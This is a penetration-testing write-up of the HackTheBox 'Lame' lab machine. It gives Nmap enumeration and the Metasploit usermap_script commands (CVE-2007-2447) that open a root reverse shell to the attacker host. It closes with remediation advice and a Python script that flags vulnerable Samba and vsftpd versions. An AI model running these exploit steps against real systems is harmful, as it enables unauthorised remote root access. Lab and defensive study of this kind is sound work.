Objective
Practice a clean penetration-testing workflow on a known vulnerable machine: enumerate exposed services, avoid rabbit holes, validate the exploitable path, and document why the compromise happened.
Environment
- Target: HackTheBox Lame
- Attacker host: Kali Linux
- Primary tools: Nmap, Metasploit, service-version research
- Learning goal: Connect version enumeration to exploit validation and defensive remediation
Reconnaissance
Initial Nmap scan revealed a Linux host with limited open ports.
```
nmap -sC -sV -p- 10.10.10.3
```
Open ports:
- 21/tcp — vsftpd 2.3.4
- 22/tcp — OpenSSH 4.7p1
- 139/445/tcp — Samba 3.0.20
Vulnerability Research
The vsftpd version carries a known backdoor (CVE-2011-2523), but on this target it was patched, so the focus shifted to Samba.
Samba 3.0.20 is vulnerable to CVE-2007-2447 — username map script command execution.
Exploitation
Used Metasploit's exploit/multi/samba/usermap_script module:
```
msfconsole -q
use exploit/multi/samba/usermap_script
set RHOST 10.10.10.3
set LHOST tun0
run
```
Shell obtained as root immediately — no privilege escalation needed.
Post Exploitation
```
whoami
# root
cat /root/root.txt
# <root flag>
```
Evidence Summary
| Evidence | Finding | Analyst Note |
|---|---|---|
| Port scan | SMB exposed on 139/445 | High-priority service to enumerate |
| Version | Samba 3.0.20 | Known vulnerable service version |
| CVE | CVE-2007-2447 | Username map script RCE path |
| Access | Root shell | No local privilege escalation required |
Defensive Takeaway
The fix is not only patching Samba. The defensive lesson is to maintain service inventory, flag obsolete versions, restrict SMB exposure, and monitor authentication or unexpected command execution around legacy file-sharing services.
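As an added example, not part of the original write-up, the following Python script turns the version enumeration above into the inventory check this takeaway describes: it parses `nmap -sV` output, flags the two versions named in this write-up against their CVEs, and checks an smb.conf fragment for the `username map script` directive that CVE-2007-2447 depends on. The scan lines, the smb.conf fragment and the script path in it are constructed samples, not captured from the target.

```python
import re

# Constructed sample of `nmap -sV` normal output, modelled on the Lame scan
# (not a captured scan).
SAMPLE_NMAP = """\
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Constructed smb.conf fragment; the directive below is what CVE-2007-2447 needs.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+\S+\s+(.*)$")
SAMBA_VER = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)")


def flag_services(nmap_text):
    """Return (port, version string, CVE) for known-vulnerable versions in the scan."""
    findings = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # header, closed ports and non-service lines are skipped
        port, version = int(m.group(1)), m.group(3)
        if version.startswith("vsftpd 2.3.4"):
            findings.append((port, version, "CVE-2011-2523"))
        s = SAMBA_VER.search(version)
        # CVE-2007-2447 affects Samba 3.0.0 up to, but not including, 3.0.25.
        if s and (int(s.group(1)), int(s.group(2))) == (3, 0) and int(s.group(3)) < 25:
            findings.append((port, version, "CVE-2007-2447"))
    return findings


def smb_conf_has_usermap_script(conf_text):
    """True when an active (uncommented) 'username map script' directive is set."""
    for line in conf_text.splitlines():
        stripped = line.strip()
        if stripped.startswith(("#", ";")):
            continue
        key = stripped.split("=", 1)[0].strip().lower()
        if key == "username map script":
            return True
    return False
```

A hit from `flag_services` is a reason to verify and patch; a hit from `smb_conf_has_usermap_script` on a 3.0.x host is the condition under which the username map script path is actually reachable.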
Key Takeaways
- Always check Samba versions — 3.x has several critical RCE vulnerabilities
- CVE-2007-2447 gives instant root on unpatched systems
- Check for patched backdoors — vsftpd 2.3.4 is famous but often mitigated